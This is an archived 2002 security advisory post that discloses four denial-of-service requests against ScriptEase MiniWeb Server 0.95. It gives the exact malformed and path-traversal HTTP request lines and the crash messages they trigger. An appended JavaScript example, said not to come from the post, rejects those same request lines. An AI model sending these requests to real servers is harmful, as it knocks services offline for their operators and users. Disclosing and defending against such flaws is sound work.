Four More ScriptEase MiniWeb Server v0.95 DoS Attacks

From: 'ken'@FTU
Date: Tue Feb 19 2002 - 20:03:37 PST


    The following are four more Server Denial of Service Attacks against 
    ScriptEase MiniWeb Server 0.95.
    
    These attacks do not make the server point to an invalid memory address 
    like the previous post.
    
    I believe the first two attacks I describe are internal server problems 
    due to either coding errors or incomplete coding. The second two may 
    just be configuration problems on my part, as this assessment was done 
    fairly quickly.
    
    After we receive "Press a key..." on the server side, the server stops 
    and needs to be manually restarted.
    
    Thanks to Tamer Sahin for his earlier post.
    (http://www.securityfocus.com/archive/1/257031)
    
    Cheers,
    'ken'@FTU
    
    
    <--------------- BOF ------------->
    
    Dos One.
    We Send:
    GET /%2e%2e/ HTTP/1.0
    
    ScriptEase Internal Server Reply:
    1512: Cannot compare variable of different dimension.
    Press a key...
    
    =======
    
    Dos Two.
    We Send:
    GET /../../../../../../../../../ HTTP/1.0
    
    ScriptEase Internal Server Reply:
    1512: Cannot compare variable of different dimension.
    Press a key...
    
    =======
    
    Dos Three.
    We Send:
    GET HTTP/1.0
    
    ScriptEase Internal Server Reply:
    5108: Invalid VA_LIST.
    Press a key...
    
    =======
    
    Dos Four.
    We Send:
    GET ../../../../../../../../../../ HTTP/1.0
    
    ScriptEase Internal Server Reply:
    5108: Invalid VA_LIST.
    Press a key...
    
    
    <--------------- EOF ------------->
    
    
    
    
    -- 
    "I grew convinced that truth, sincerity and integrity in dealings 
    between man and man were of the utmost importance to the felicity of 
    life, and I formed a written resolution to practise them ever while I 
    lived."
    	-Benjamin Franklin, The Autobiography of Benjamin Franklin
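
The request lines in the post fail in the server's own parsing, so a server-side check that answers them with a 400 instead of an internal error looks like the following. This is an added example, not part of the original post and not MiniWeb's code; the function names checkRequestLine and resolvePath are hypothetical, and it assumes the target is percent-decoded exactly once before the path is resolved.

```javascript
// Added example: strict request-line check for a small HTTP server.
// checkRequestLine and resolvePath are hypothetical names, not MiniWeb's.

// Resolve a decoded path against the document root; null if it climbs above it.
function resolvePath(decoded) {
  const out = [];
  for (const seg of decoded.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {
      if (out.length === 0) return null; // would leave the document root
      out.pop();
    } else {
      out.push(seg);
    }
  }
  return '/' + out.join('/');
}

function checkRequestLine(line) {
  const bad = (reason) => ({ status: 400, reason });
  const parts = line.replace(/\r?\n$/, '').split(' ');
  if (parts.length !== 3) return bad('expected METHOD SP TARGET SP VERSION');
  const [method, target, version] = parts;
  if (!/^[A-Z]+$/.test(method)) return bad('bad method');
  if (!/^HTTP\/\d\.\d$/.test(version)) return bad('bad version');
  if (!target.startsWith('/')) return bad('target must start with "/"');
  let decoded;
  try {
    decoded = decodeURIComponent(target.split('?')[0]); // decode once only
  } catch (e) {
    return bad('malformed percent-encoding');
  }
  if (/[\0\\]/.test(decoded)) return bad('NUL or backslash in path');
  const path = resolvePath(decoded);
  if (path === null) return bad('path escapes document root');
  return { status: 200, path };
}

// The four request lines from the post, plus one ordinary request.
const samples = [
  'GET /%2e%2e/ HTTP/1.0',
  'GET /../../../../../../../../../ HTTP/1.0',
  'GET HTTP/1.0',
  'GET ../../../../../../../../../../ HTTP/1.0',
  'GET /docs/./index.html HTTP/1.0',
];
for (const s of samples) console.log(JSON.stringify(s), '->', checkRequestLine(s));
```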
    


